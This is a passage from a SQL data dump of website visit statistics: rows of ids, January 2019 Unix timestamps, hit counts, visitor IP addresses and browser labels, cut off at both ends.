'),(375794,1548212335,8,8,0,0,'216.244.66.241','other'),(375795,1548212983,1,1,0,0,'54.36.149.48','other'),(375796,1548213005,2,2,0,0,'66.249.75.142','chrome'),(375797,1548213090,1,1,0,0,'54.36.148.43','other'),(375798,1548213223,2,2,0,0,'91.242.162.46','other'),(375799,1548213595,1,1,0,0,'54.36.149.106','other'),(375800,1548214100,1,1,0,0,'54.36.149.66','other'),(375801,1548214105,1,1,0,0,'54.36.149.102','other'),(375802,1548214147,16,16,0,0,'216.244.66.241','other'),(375803,1548214158,1,1,0,0,'54.36.149.48','other'),(375804,1548214501,1,1,0,0,'54.36.149.45','other'),(375805,1548214597,1,1,0,0,'54.36.148.85','other'),(375806,1548214909,1,1,0,0,'54.36.148.120','other'),(375807,1548215118,3,3,0,0,'216.244.66.241','other'),(375808,1548215147,1,1,0,0,'46.229.168.148','other'),(375809,1548215226,1,1,0,0,'54.36.148.67','other'),(375810,1548215247,1,1,0,0,'157.55.39.61','other'),(375811,1548215343,1,1,0,0,'54.36.148.63','other'),(375812,1548215351,1,1,0,0,'54.36.148.211','other'),(375813,1548215605,1,1,0,0,'13.66.139.0','other'),(375814,1548215908,1,1,0,0,'54.36.149.73','other'),(375815,1548216033,2,2,0,0,'5.45.207.79','other'),(375816,1548216087,3,3,0,0,'95.108.213.4','other'),(375817,1548216133,1,1,0,0,'54.36.148.104','other'),(375818,1548216209,2,2,0,0,'141.8.142.103','other'),(375819,1548216219,3,3,0,0,'178.154.244.11','other'),(375820,1548216951,1,1,0,0,'46.229.168.153','other'),(375821,1548216970,3,3,0,0,'216.244.66.241','other'),(375822,1548217098,1,1,0,0,'37.9.113.148','other'),(375823,1548217140,1,1,0,0,'141.8.142.103','other'),(375824,1548217157,1,1,0,0,'95.108.213.4','other'),(375825,1548217373,1,1,0,0,'178.154.244.11','other'),(375826,1548217555,1,1,0,0,'157.55.39.79','other'),(375827,1548217691,1,1,0,0,'46.229.168.141','other'),(375828,1548217805,1,1,0,0,'54.36.148.237','other'),(375829,1548217895,11,11,0,0,'216.244.66.241','other'),(375830,1548218167,1,1,0,0,'37.9.113.20','other'),(375831,1548218218,1,1,0,0,'46.229.168.135','other'),(375832,1548219082,1,1,0,0,'102.165.49.115','other'),(375833,1548219134,1,1,0,0,'141.8.183.22','other'),(375834,1548219261,1,1,0,0,'54.36.148.113','other'),(375835,1548219377,1,1,0,0,'54.36.149.23','other'),(375836,1548219595,1,1,0,0,'8.29.198.25','other'),(375837,1548219756,6,6,0,0,'216.244.66.241','other'),(375838,1548219767,1,1,0,0,'157.55.39.174','other'),(375839,1548219922,2,2,0,0,'100.26.53.54','chrome'),(375840,1548219983,1,1,0,0,'54.36.148.156','other'),(375841,1548220036,1,1,0,0,'54.36.148.205','other'),(375842,1548220041,1,1,0,0,'54.36.148.33','other'),(375843,1548220371,1,1,0,0,'54.36.148.37','other'),(375844,1548220441,1,1,0,0,'54.36.148.94','other'),(375845,1548220646,1,1,0,0,'54.36.149.21','other'),(375846,1548220714,11,11,0,0,'216.244.66.241','other'),(375847,1548220775,1,1,0,0,'54.36.148.222','other'),(375848,1548220777,1,1,0,0,'54.36.148.210','other'),(375849,1548220920,1,1,0,0,'46.229.168.144','other'),(375850,1548221048,1,1,0,0,'54.36.148.100','other'),(375851,1548221446,7,7,0,0,'157.55.39.174','other'),(375852,1548221476,1,1,0,0,'8.29.198.27','other'),(375853,1548221874,1,1,0,0,'54.36.148.219','other'),(375854,1548222124,1,1,0,0,'40.77.167.189','other'),(375855,1548222142,1,1,0,0,'54.36.148.68','other'),(375856,1548222185,1,1,0,0,'54.36.149.52','other'),(375857,1548222248,1,1,0,0,'54.36.148.196','other'),(375858,1548222279,1,1,0,0,'54.36.148.201','other'),(375859,1548222337,1,1,0,0,'46.229.168.146','other'),(375860,1548222491,1,1,0,0,'54.36.149.0','other'),(375861,1548222492,7,7,0,0,'216.244.66.241','other'),(375862,1548222640,1,1,0,0,'54.36.149.18','other'),(375863,1548223076,1,1,0,0,'54.36.148.56','other'),(375864,1548223168,1,0,1,0,'66.249.75.140',''),(375865,1548223400,9,9,0,0,'216.244.66.241','other'),(375866,1548223471,1,1,0,0,'54.36.149.86','other'),(375867,1548224050,1,1,0,0,'54.36.148.121','other'),(375868,1548224197,2,2,0,0,'89.31.57.5','other'),(375869,1548224383,3,3,0,0,'216.244.66.241','other'),(375870,1548224578,1,1,0,0,'54.36.149.84','other'),(375871,1548224696,1,1,0,0,'54.36.149.90','other'),(375872,1548224711,3,3,0,0,'91.196.178.85','chrome'),(375873,1548224977,3,3,0,0,'91.196.178.75','chrome'),(375874,1548225100,1,1,0,0,'54.36.148.69','other'),(375875,1548225418,7,7,0,0,'216.244.66.241','other'),(375876,1548225545,1,1,0,0,'54.36.148.188','other'),(375877,1548225614,1,1,0,0,'95.163.255.99','other'),(375878,1548225617,1,1,0,0,'95.163.255.96','other'),(375879,1548225621,1,1,0,0,'54.36.148.113','other'),(375880,1548225682,4,4,0,0,'91.196.178.173','chrome'),(375881,1548225691,1,1,0,0,'46.229.168.142','other'),(375882,1548225693,1,1,0,0,'46.229.168.134','other'),(375883,1548226003,1,0,1,0,'66.249.75.144',''),(375884,1548226062,1,1,0,0,'54.36.148.112','other'),(375885,1548226245,2,2,0,0,'91.196.178.66','chrome'),(375886,1548226275,1,1,0,0,'207.46.13.1','other'),(375887,1548226540,1,1,0,0,'54.36.148.207','other'),(375888,1548226549,2,2,0,0,'141.8.142.103','other'),(375889,1548226571,1,1,0,0,'54.36.148.217','other'),(375890,1548226605,1,1,0,0,'54.36.148.194','other'),(375891,1548226808,1,1,0,0,'66.249.69.149','chrome'),(375892,1548227060,1,1,0,0,'54.36.148.82','other'),(375893,1548227468,1,1,0,0,'46.229.168.147','other'),(375894,1548227477,2,2,0,0,'87.250.224.118','other'),(375895,1548227481,2,2,0,0,'213.180.203.23','other'),(375896,1548227675,1,1,0,0,'54.36.148.146','other'),(375897,1548227741,1,1,0,0,'141.8.142.191','other'),(375898,1548227742,1,1,0,0,'95.108.213.50','other'),(375899,1548227787,1,1,0,0,'141.8.142.38','other'),(375900,1548227915,1,1,0,0,'141.8.183.11','other'),(375901,1548227996,14,14,0,0,'216.244.66.241','other'),(375902,1548227997,1,1,0,0,'46.200.0.55','chrome'),(375903,1548228031,2,2,0,0,'37.9.113.20','other'),(375904,1548228075,1,1,0,0,'95.108.181.54','other'),(375905,1548228160,1,1,0,0,'178.154.244.11','other'),(375906,1548228286,1,1,0,0,'37.9.113.148','other'),(375907,1548228325,2,2,0,0,'207.46.13.195','other'),(375908,1548228365,1,1,0,0,'54.36.148.96','other'),(375909,1548228485,1,1,0,0,'66.249.75.155','chrome'),(375910,1548228486,2,1,1,0,'66.249.75.144',''),(375911,1548228519,3,3,0,0,'91.196.178.71','chrome'),(375912,1548228601,1,1,0,0,'54.36.148.250','other'),(375913,1548228841,1,1,0,0,'54.36.148.220','other'),(375914,1548229043,1,1,0,0,'54.36.148.252','other'),(375915,1548229302,1,1,0,0,'54.36.148.179','other'),(375916,1548229392,1,1,0,0,'216.244.66.241','other'),(375917,1548229451,1,1,0,0,'54.36.148.70','other'),(375918,1548229477,1,1,0,0,'54.36.148.13','other'),(375919,1548229531,1,1,0,0,'35.187.28.186','other'),(375921,1548229565,1,1,0,0,'54.36.148.99','other'),(375922,1548229715,1,1,0,0,'13.66.139.0','other'),(375923,1548230147,1,1,0,0,'54.36.148.121','other'),(375924,1548230316,1,1,0,0,'54.36.148.42','other'),(375925,1548230371,1,1,0,0,'66.249.69.144','chrome'),(375926,1548230372,1,1,0,0,'66.249.69.148','chrome'),(375927,1548230393,1,1,0,0,'46.211.150.164','chrome'),(375928,1548230456,1,1,0,0,'8.29.198.26','other'),(375929,1548230704,1,1,0,0,'54.36.148.205','other'),(375930,1548230776,1,1,0,0,'54.36.148.77','other'),(375931,1548230780,1,1,0,0,'180.76.15.157','other'),(375932,1548230783,1,1,0,0,'180.76.15.5','other'),(375933,1548230791,13,13,0,0,'216.244.66.241','other'),(375934,1548231027,1,1,0,0,'54.36.148.29','other'),(375935,1548231122,1,1,0,0,'54.36.148.11','other'),(375936,1548231310,14,14,0,0,'40.77.167.135','other'),(375937,1548231571,1,1,0,0,'54.36.149.38','other'),(375938,1548231574,1,1,0,0,'66.249.69.145','chrome'),(375939,1548231575,2,2,0,0,'66.249.69.149','chrome'),(375940,1548231576,1,1,0,0,'54.36.148.144','other'),(375941,1548231720,1,1,0,0,'54.36.148.83','other'),(375942,1548231756,1,1,0,0,'216.244.66.241','other'),(375943,1548231767,1,1,0,0,'66.249.69.143','chrome'),(375944,1548231843,1,1,0,0,'54.36.149.17','other'),(375945,1548231849,1,1,0,0,'91.196.178.166','chrome'),(375946,1548231943,1,1,0,0,'141.8.142.144','other'),(375947,1548232193,2,2,0,0,'91.196.178.66','chrome'),(375948,1548232224,1,1,0,0,'66.249.69.148','chrome'),(375949,1548232300,1,1,0,0,'54.36.149.5','other'),(375950,1548232305,1,1,0,0,'8.29.198.25','other'),(375951,1548232358,1,1,0,0,'54.36.148.34','other'),(375952,1548232578,1,1,0,0,'207.46.13.39','other'),(375953,1548232591,1,1,0,0,'54.36.148.16','other'),(375954,1548232812,8,8,0,0,'216.244.66.241','other'),(375955,1548232813,1,1,0,0,'46.229.168.138','other'),(375956,1548233032,1,1,0,0,'54.36.148.75','other'),(375957,1548233140,1,1,0,0,'54.36.149.14','other'),(375958,1548233280,1,1,0,0,'128.72.159.196','chrome'),(375959,1548233448,1,1,0,0,'46.229.168.139','other'),(375960,1548233492,1,1,0,0,'54.36.148.197','other'),(375961,1548233714,10,10,0,0,'216.244.66.241','other'),(375962,1548233788,1,1,0,0,'54.36.148.172','other'),(375963,1548233792,1,1,0,0,'54.36.148.38','other'),(375964,1548234066,1,1,0,0,'54.36.148.166','other'),(375965,1548234183,1,1,0,0,'54.36.148.133','other'),(375966,1548234454,1,1,0,0,'54.36.148.76','other'),(375967,1548234595,1,1,0,0,'54.36.148.23','other'),(375968,1548234780,2,2,0,0,'66.249.75.140','chrome'),(375969,1548234831,1,1,0,0,'66.249.69.149','chrome'),(375970,1548235261,1,1,0,0,'66.249.75.155','chrome'),(375971,1548235358,2,2,0,0,'91.196.178.71','firefox'),(375972,1548235445,1,1,0,0,'40.77.167.58','other'),(375973,1548235654,1,1,0,0,'54.36.149.12','other'),(375974,1548235676,1,1,0,0,'54.36.149.67','other'),(375975,1548235693,1,1,0,0,'54.36.148.106','other'),(375976,1548235727,1,1,0,0,'54.36.148.64','other'),(375977,1548235813,1,1,0,0,'87.250.224.47','other'),(375978,1548235897,1,1,0,0,'54.36.149.13','other'),(375979,1548236210,1,1,0,0,'66.249.75.157','chrome'),(375980,1548236211,1,1,0,0,'66.249.75.144','chrome'),(375981,1548236212,1,1,0,0,'178.133.58.136','chrome'),(375982,1548236272,4,4,0,0,'216.244.66.241','other'),(375983,1548236336,1,1,0,0,'54.36.149.100','other'),(375984,1548236428,1,1,0,0,'207.46.13.39','other'),(375985,1548236807,1,1,0,0,'54.36.149.0','other'),(375986,1548237197,10,10,0,0,'216.244.66.241','other'),(375987,1548237520,1,1,0,0,'54.36.149.26','other'),(375988,1548237567,2,2,0,0,'91.196.178.71','chrome'),(375989,1548237621,1,1,0,0,'54.36.148.215','other'),(375990,1548237663,1,1,0,0,'54.36.149.102','other'),(375991,1548237696,1,1,0,0,'54.36.148.178','other'),(375992,1548237801,1,1,0,0,'46.229.168.153','other'),(375993,1548237824,1,1,0,0,'157.55.39.120','other'),(375994,1548237870,2,2,0,0,'95.213.141.126','opera'),(375995,1548237960,1,1,0,0,'54.36.148.29','other'),(375996,1548238074,1,1,0,0,'178.154.244.11','other'),(375997,1548238506,1,1,0,0,'54.36.148.22','other'),(375998,1548238712,1,1,0,0,'40.77.167.5','other'),(375999,1548238785,1,1,0,0,'5.45.207.79','other'),(376000,1548238803,1,1,0,0,'54.36.149.57','other'),(376001,1548238872,1,1,0,0,'54.36.148.108','other'),(376002,1548238880,1,1,0,0,'54.36.148.140','other'),(376003,1548238895,1,1,0,0,'46.229.168.150','other'),(376004,1548238999,1,1,0,0,'141.8.142.103','other'),(376005,1548239027,12,12,0,0,'216.244.66.241','other'),(376006,1548239057,2,2,0,0,'178.154.244.11','other'),(376007,1548239074,1,1,0,0,'66.249.75.153','chrome'),(376008,1548239075,1,1,0,0,'66.249.75.144','chrome'),(376009,1548239400,2,2,0,0,'91.196.177.46','firefox'),(376010,1548239455,2,2,0,0,'5.45.207.19','other'),(376011,1548239523,1,1,0,0,'95.108.213.4','other'),(376012,1548239568,1,1,0,0,'46.229.168.133','other'),(376013,1548239693,1,1,0,0,'66.249.75.15','chrome'),(376014,1548239694,1,1,0,0,'54.36.149.24','other'),(376015,1548239696,1,1,0,0,'66.249.75.20','chrome'),(376016,1548239905,1,1,0,0,'54.36.148.222','other'),(376017,1548239970,1,1,0,0,'46.229.168.139','other'),(376018,1548240051,1,1,0,0,'46.229.168.137','other'),(376019,1548240225,1,1,0,0,'212.113.40.44','chrome'),(376020,1548240365,1,1,0,0,'54.36.149.93','other'),(376021,1548240390,1,1,0,0,'54.36.148.90','other'),(376022,1548240652,1,1,0,0,'54.36.148.112','other'),(376023,1548240857,1,1,0,0,'216.244.66.241','other'),(376024,1548241169,1,1,0,0,'54.36.148.148','other'),(376025,1548241189,1,1,0,0,'54.36.148.235','other'),(376026,1548241290,1,1,0,0,'8.29.198.25','other'),(376027,1548241516,2,2,0,0,'78.111.185.231','chrome'),(376028,1548241561,1,1,0,0,'54.36.148.217','other'),(376029,1548241759,17,17,0,0,'216.244.66.241','other'),(376030,1548241762,1,1,0,0,'46.229.168.148','other'),(376031,1548241784,3,3,0,0,'91.196.177.46','chrome'),(376032,1548241935,1,1,0,0,'46.229.168.149','other'),(376033,1548242132,1,1,0,0,'54.36.148.247','other'),(376034,1548242200,1,1,0,0,'54.36.148.172','other'),(376035,1548242250,1,1,0,0,'54.36.149.71','other'),(376036,1548242570,1,1,0,0,'54.36.148.134','other'),(376037,1548242592,1,1,0,0,'54.36.148.55','other'),(376038,1548242661,1,1,0,0,'79.110.130.60','chrome'),(376039,1548242722,1,1,0,0,'54.36.148.121','other'),(376040,1548242724,1,1,0,0,'66.249.75.21','chrome'),(376041,1548242784,1,1,0,0,'54.36.148.225','other'),(376042,1548243127,1,1,0,0,'54.36.148.11','other'),(376043,1548243132,1,1,0,0,'8.29.198.26','other'),(376044,1548243347,1,1,0,0,'54.36.149.11','other'),(376045,1548243444,1,1,0,0,'66.249.75.20','chrome'),(376046,1548243623,3,3,0,0,'216.244.66.241','other'),(376047,1548243948,1,1,0,0,'207.46.13.39','other'),(376048,1548244077,1,1,0,0,'54.36.148.40','other'),(376049,1548244199,1,1,0,0,'46.229.168.153','other'),(376050,1548244202,1,1,0,0,'54.36.149.26','other'),(376051,1548244387,1,1,0,0,'54.36.148.18','other'),(376052,1548244394,1,1,0,0,'54.36.148.51','other'),(376053,1548244633,1,1,0,0,'54.36.149.8','other'),(376054,1548244708,1,1,0,0,'54.36.148.108','other'),(376055,1548244738,3,3,0,0,'216.244.66.241','other'),(376056,1548244906,1,1,0,0,'54.36.148.131','other'),(376057,1548245051,1,1,0,0,'54.36.149.96','other'),(376058,1548245120,4,4,0,0,'91.196.178.101','chrome'),(376059,1548245191,2,2,0,0,'91.229.121.2','chrome'),(376060,1548245398,1,1,0,0,'54.36.148.83','other'),(376061,1548245496,2,2,0,0,'91.196.177.15','firefox'),(376062,1548245680,1,1,0,0,'91.242.162.35','other'),(376063,1548245691,1,1,0,0,'66.249.75.22','chrome'),(376064,1548245946,1,1,0,0,'54.36.148.140','other'),(376065,1548246043,1,1,0,0,'54.36.148.240','other'),(376066,1548246070,1,1,0,0,'54.36.148.252','other'),(376067,1548246089,1,1,0,0,'207.46.13.39','other'),(376068,1548246268,1,1,0,0,'54.36.148.202','other'),(376069,1548246270,1,1,0,0,'54.36.148.246','other'),(376070,1548246340,1,1,0,0,'54.36.148.169','other'),(376071,1548246382,1,1,0,0,'91.196.177.46','chrome'),(376072,1548246654,1,1,0,0,'66.249.75.140','chrome'),(376073,1548246714,2,2,0,0,'83.170.240.174','chrome'),(376074,1548246857,1,1,0,0,'157.55.39.120','other'),(376075,1548247144,1,1,0,0,'54.36.148.45','other'),(376076,1548247249,1,1,0,0,'54.36.148.167','other'),(376077,1548247324,12,12,0,0,'216.244.66.241','other'),(376078,1548247353,3,3,0,0,'91.242.162.35','other'),(376079,1548247457,1,1,0,0,'91.196.178.66','chrome'),(376080,1548247474,2,2,0,0,'91.196.178.85','firefox'),(376081,1548247486,1,1,0,0,'54.36.149.17','other'),(376082,1548247534,1,1,0,0,'54.36.148.245','other'),(376083,1548247544,1,1,0,0,'54.36.148.76','other'),(376084,1548247623,1,1,0,0,'54.36.149.11','other'),(376085,1548247712,1,1,0,0,'54.36.148.181','other'),(376086,1548247855,1,1,0,0,'66.249.75.157','chrome'),(376087,1548247856,1,1,0,0,'66.249.75.142','chrome'),(376088,1548247897,1,1,0,0,'91.196.178.85','chrome'),(376089,1548248074,1,1,0,0,'178.154.244.11','other'),(376090,1548248075,1,1,0,0,'5.45.207.19','other'),(376091,1548248250,3,3,0,0,'216.244.66.241','other'),(376092,1548248410,1,1,0,0,'95.158.2.60','other'),(376093,1548248490,1,1,0,0,'54.36.148.13','other'),(376094,1548248573,1,1,0,0,'66.249.75.17','chrome'),(376095,1548248574,1,1,0,0,'66.249.75.22','chrome'),(376096,1548248576,1,1,0,0,'54.36.148.45','other'),(376097,1548248608,1,1,0,0,'54.36.149.51','other'),(376098,1548248729,1,1,0,0,'54.36.149.48','other'),(376099,1548248908,2,2,0,0,'91.196.178.66','chrome'),(376100,1548248940,1,1,0,0,'54.36.148.37','other'),(376101,1548249071,1,1,0,0,'54.36.149.104','other'),(376102,1548249159,1,1,0,0,'39.98.177.226','other'),(376103,1548249176,1,1,0,0,'180.76.15.148','other'),(376104,1548249177,1,1,0,0,'180.76.15.8','other'),(376105,1548249363,1,1,0,0,'54.36.149.75','other'),(376106,1548249475,1,1,0,0,'54.36.148.60','other'),(376107,1548249546,1,1,0,0,'87.250.224.65','other'),(376108,1548249547,2,2,0,0,'95.108.213.4','other'),(376109,1548249854,60,60,0,0,'54.234.75.144','other'),(376110,1548249879,2,2,0,0,'5.45.207.79','other'),(376111,1548249940,2,2,0,0,'91.196.178.66','chrome'),(376112,1548250047,1,1,0,0,'54.36.148.96','other'),(376113,1548250053,1,1,0,0,'54.36.149.94','other'),(376114,1548250085,11,11,0,0,'216.244.66.241','other'),(376115,1548250166,1,1,0,0,'54.36.148.66','other'),(376116,1548250277,1,1,0,0,'54.36.148.69','other'),(376117,1548250286,1,1,0,0,'54.36.148.63','other'),(376118,1548250302,1,1,0,0,'54.36.149.82','other'),(376119,1548250357,1,1,0,0,'141.8.142.103','other'),(376120,1548250358,1,1,0,0,'178.154.244.11','other'),(376121,1548250404,1,1,0,0,'54.36.148.189','other'),(376122,1548250509,1,1,0,0,'193.34.216.137','chrome'),(376123,1548250511,1,1,0,0,'46.229.168.140','other'),(376124,1548250630,1,1,0,0,'54.36.148.186','other'),(376125,1548250758,25,25,0,0,'54.234.75.144','other'),(376126,1548250773,1,1,0,0,'54.36.149.23','other'),(376127,1548250805,3,3,0,0,'91.196.177.46','chrome'),(376128,1548251218,2,2,0,0,'216.244.66.241','other'),(376129,1548251518,1,1,0,0,'54.36.148.143','other'),(376130,1548251678,12,12,0,0,'54.234.75.144','other'),(376131,1548251743,6,6,0,0,'146.185.157.250','chrome'),(376132,1548251932,1,1,0,0,'54.36.149.63','other'),(376133,1548251995,1,1,0,0,'54.36.148.72','other'),(376134,1548252002,1,1,0,0,'54.36.149.58','other'),(376135,1548252130,1,1,0,0,'8.29.198.26','other'),(376136,1548252174,2,2,0,0,'188.231.244.35','chrome'),(376137,1548252505,1,1,0,0,'94.178.104.170','firefox'),(376138,1548252688,1,1,0,0,'54.36.149.55','other'),(376139,1548252730,25,25,0,0,'54.234.75.144','other'),(376140,1548252787,2,2,0,0,'54.218.87.97','chrome'),(376141,1548252873,13,13,0,0,'216.244.66.241','other'),(376142,1548252971,1,1,0,0,'54.36.149.27','other'),(376143,1548253000,1,1,0,0,'54.36.148.175','other'),(376144,1548253112,1,1,0,0,'180.76.15.17','other'),(376145,1548253154,1,1,0,0,'54.36.148.200','other'),(376146,1548253159,1,1,0,0,'54.36.148.250','other'),(376147,1548253415,3,3,0,0,'91.196.178.71','firefox'),(376148,1548253442,1,1,0,0,'46.229.168.152','other'),(376149,1548253660,30,30,0,0,'54.234.75.144','other'),(376150,1548253677,2,2,0,0,'91.196.178.66','chrome'),(376151,1548253680,1,1,0,0,'95.163.255.95','other'),(376152,1548253684,1,1,0,0,'95.163.255.92','other'),(376153,1548253777,1,1,0,0,'54.36.148.17','other'),(376154,1548253805,1,1,0,0,'54.36.148.61','other'),(376155,1548253951,1,1,0,0,'8.29.198.25','other'),(376156,1548253968,1,1,0,0,'54.36.148.197','other'),(376157,1548254040,1,1,0,0,'54.36.148.15','other'),(376158,1548254079,1,1,0,0,'54.36.148.21','other'),(376159,1548254081,1,1,0,0,'54.36.148.195','other'),(376160,1548254092,1,1,0,0,'157.55.39.50','other'),(376161,1548254252,1,1,0,0,'54.36.148.68','other'),(376162,1548254429,1,1,0,0,'91.196.178.71','firefox'),(376163,1548254459,1,1,0,0,'54.36.149.16','other'),(376164,1548254555,1,1,0,0,'37.52.45.231','chrome'),(376165,1548254592,1,1,0,0,'54.36.148.188','other'),(376166,1548254597,17,17,0,0,'54.234.75.144','other'),(376167,1548254699,1,1,0,0,'54.36.149.83','other'),(376168,1548255233,1,1,0,0,'54.36.148.35','other'),(376169,1548255302,1,1,0,0,'54.36.148.126','other'),(376170,1548255510,17,17,0,0,'54.234.75.144','other'),(376171,1548255608,9,9,0,0,'216.244.66.241','other'),(376172,1548255612,1,1,0,0,'178.94.32.235','chrome'),(376173,1548255826,1,1,0,0,'54.36.148.160','other'),(376174,1548255924,1,1,0,0,'46.229.168.134','other'),(376175,1548256062,1,1,0,0,'66.249.75.16','chrome'),(376176,1548256070,1,1,0,0,'66.249.75.21','chrome'),(376177,1548256191,1,1,0,0,'54.36.148.201','other'),(376178,1548256382,1,1,0,0,'54.36.149.8','other'),(376179,1548256397,1,1,0,0,'54.36.148.71','other'),(376180,1548256575,1,1,0,0,'54.36.148.245','other'),(376181,1548256624,1,1,0,0,'157.55.39.50','other'),(376182,1548256829,1,1,0,0,'54.36.148.115','other'),(376183,1548256998,4,4,0,0,'216.244.66.241','other'),(376184,1548257021,1,1,0,0,'54.36.148.120','other'),(376185,1548257082,1,1,0,0,'80.77.46.44','chrome'),(376186,1548257149,2,2,0,0,'91.196.178.71','chrome'),(376187,1548257251,1,1,0,0,'54.36.148.240','other'),(376188,1548257280,1,1,0,0,'54.36.149.0','other'),(376189,1548257282,1,1,0,0,'46.229.168.135','other'),(376190,1548257290,1,1,0,0,'54.36.148.163','other'),(376191,1548257345,2,2,0,0,'207.46.13.39','other'),(376192,1548257440,1,1,0,0,'54.36.148.178','other'),(376193,1548257709,1,1,0,0,'54.36.148.21','other'),(376194,1548257746,1,1,0,0,'54.36.148.169','other'),(376195,1548257804,1,1,0,0,'54.36.148.87','other'),(376196,1548258044,1,1,0,0,'46.229.168.142','other'),(376197,1548258047,1,1,0,0,'46.229.168.147','other'),(376198,1548258079,1,1,0,0,'54.36.148.186','other'),(376199,1548258227,1,1,0,0,'66.249.75.21','chrome'),(376200,1548258368,1,1,0,0,'54.36.149.38','other'),(376201,1548258377,7,7,0,0,'216.244.66.241','other'),(376202,1548258456,1,1,0,0,'207.46.13.39','other'),(376203,1548258779,1,1,0,0,'54.36.148.224','other'),(376204,1548259136,1,1,0,0,'54.36.148.184','other'),(376205,1548259416,1,1,0,0,'207.46.13.148','other'),(376206,1548260044,1,1,0,0,'66.249.79.161','chrome'),(376207,1548260098,1,1,0,0,'54.36.149.40','other'),(376208,1548260264,1,1,0,0,'54.36.148.197','other'),(376209,1548260289,1,1,0,0,'54.36.148.212','other'),(376210,1548260364,1,1,0,0,'54.36.148.149','other'),(376211,1548260381,1,1,0,0,'216.244.66.241','other'),(376212,1548260386,1,1,0,0,'66.249.75.16','chrome'),(376213,1548260421,1,1,0,0,'46.229.168.143','other'),(376214,1548260567,1,1,0,0,'5.45.207.19','other'),(376215,1548260794,1,1,0,0,'35.192.84.7','other'),(376216,1548261052,1,1,0,0,'54.36.148.49','other'),(376217,1548261096,1,1,0,0,'5.45.207.79','other'),(376218,1548261253,1,1,0,0,'54.36.148.11','other'),(376219,1548261337,1,1,0,0,'216.244.66.241','other'),(376220,1548261342,2,2,0,0,'178.154.244.11','other'),(376221,1548261400,1,1,0,0,'95.108.213.4','other'),(376222,1548261448,3,3,0,0,'66.249.75.20','chrome'),(376223,1548261455,1,1,0,0,'66.249.75.16','chrome'),(376224,1548261478,1,1,0,0,'54.36.148.162','other'),(376225,1548261611,1,1,0,0,'54.36.148.236','other'),(376226,1548261630,1,1,0,0,'66.249.75.21','chrome'),(376227,1548261649,1,1,0,0,'54.36.148.104','other'),(376228,1548261936,1,1,0,0,'54.36.148.108','other'),(376229,1548262108,1,1,0,0,'54.36.148.97','other'),(376230,1548262522,3,3,0,0,'216.244.66.241','other'),(376231,1548262709,1,1,0,0,'66.249.75.17','chrome'),(376232,1548262719,1,1,0,0,'66.249.75.21','chrome'),(376233,1548262767,1,1,0,0,'5.45.207.79','other'),(376234,1548262966,1,1,0,0,'8.29.198.26','other'),(376235,1548263042,1,1,0,0,'54.36.148.66','other'),(376236,1548263144,1,1,0,0,'54.36.148.23','other'),(376237,1548263148,1,1,0,0,'178.154.244.11','other'),(376238,1548263196,1,1,0,0,'54.36.148.185','other'),(376239,1548263360,1,1,0,0,'54.36.148.244','other'),(376240,1548263446,1,1,0,0,'54.36.149.76','other'),(376241,1548263508,1,1,0,0,'54.36.149.0','other'),(376242,1548263846,18,18,0,0,'216.244.66.241','other'),(376243,1548263980,1,1,0,0,'54.36.148.109','other'),(376244,1548264094,1,1,0,0,'54.36.149.93','other'),(376245,1548264096,1,1,0,0,'46.229.168.132','other'),(376246,1548264176,1,1,0,0,'54.36.149.105','other'),(376247,1548264247,1,1,0,0,'54.36.148.35','other'),(376248,1548264425,1,1,0,0,'54.36.148.114','other'),(376249,1548264438,1,1,0,0,'54.36.149.89','other'),(376250,1548264490,1,1,0,0,'66.249.75.21','chrome'),(376251,1548264796,1,1,0,0,'8.29.198.26','other'),(376252,1548264825,2,2,0,0,'216.244.66.241','other'),(376253,1548264893,1,1,0,0,'54.36.149.81','other'),(376254,1548264972,1,1,0,0,'54.36.149.23','other'),(376255,1548265185,2,2,0,0,'40.77.167.86','other'),(376256,1548265190,1,1,0,0,'54.36.148.123','other'),(376257,1548265531,1,1,0,0,'78.111.187.49','chrome'),(376258,1548265834,1,1,0,0,'46.229.168.138','other'),(376259,1548265898,1,1,0,0,'54.36.148.225','other'),(376260,1548265927,1,1,0,0,'54.36.148.38','other'),(376261,1548266066,1,1,0,0,'54.36.149.87','other'),(376262,1548266378,1,1,0,0,'54.36.149.69','other'),(376263,1548266477,1,1,0,0,'54.36.148.33','other'),(376264,1548266610,10,10,0,0,'216.244.66.241','other'),(376265,1548266698,1,1,0,0,'51.255.65.46','other'),(376266,1548266803,1,1,0,0,'54.36.148.175','other'),(376267,1548266850,1,1,0,0,'46.229.168.135','other'),(376268,1548267134,1,1,0,0,'54.36.149.61','other'),(376269,1548267156,1,1,0,0,'91.242.162.77','other'),(376270,1548267216,1,1,0,0,'54.36.149.99','other'),(376271,1548267419,1,1,0,0,'54.36.148.29','other'),(376272,1548267612,1,1,0,0,'54.36.148.243','other'),(376273,1548267781,1,1,0,0,'54.36.148.239','other'),(376274,1548267902,1,1,0,0,'54.36.148.159','other'),(376275,1548267986,1,1,0,0,'54.36.148.86','other'),(376276,1548268277,1,1,0,0,'54.36.148.34','other'),(376277,1548268478,1,1,0,0,'54.36.148.74','other'),(376278,1548268580,1,1,0,0,'54.36.148.27','other'),(376279,1548268750,1,1,0,0,'54.36.149.39','other'),(376280,1548268988,1,1,0,0,'207.46.13.174','other'),(376281,1548269062,1,1,0,0,'54.36.149.48','other'),(376282,1548269145,1,1,0,0,'46.229.168.132','other'),(376283,1548269326,1,1,0,0,'66.249.75.157','chrome'),(376284,1548269351,6,6,0,0,'216.244.66.241','other'),(376285,1548269355,1,1,0,0,'66.249.75.140','chrome'),(376286,1548269546,2,2,0,0,'178.255.215.94','other'),(376287,1548269609,1,1,0,0,'54.36.148.172','other'),(376288,1548269917,1,1,0,0,'46.229.168.130','other'),(376289,1548270235,1,1,0,0,'54.36.148.55','other'),(376290,1548270657,1,1,0,0,'54.36.148.96','other'),(376291,1548270670,1,1,0,0,'5.45.207.19','other'),(376292,1548270822,1,1,0,0,'54.36.148.113','other'),(376293,1548271001,1,1,0,0,'54.36.148.127','other'),(376294,1548271061,1,1,0,0,'66.249.75.140','chrome'),(376295,1548271110,1,1,0,0,'66.249.75.22','chrome'),(376296,1548271260,1,1,0,0,'54.36.148.243','other'),(376297,1548271315,1,1,0,0,'54.36.148.121','other'),(376298,1548271355,1,1,0,0,'54.36.148.134','other'),(376299,1548271458,1,1,0,0,'54.36.148.159','other'),(376300,1548271459,2,2,0,0,'37.9.113.20','other'),(376301,1548271525,1,1,0,0,'46.229.168.141','other'),(376302,1548271540,1,1,0,0,'95.108.181.75','other'),(376303,1548271627,1,1,0,0,'54.36.148.101','other'),(376304,1548271675,1,1,0,0,'54.36.149.1','other'),(376305,1548271682,1,1,0,0,'54.36.149.35','other'),(376306,1548271751,1,1,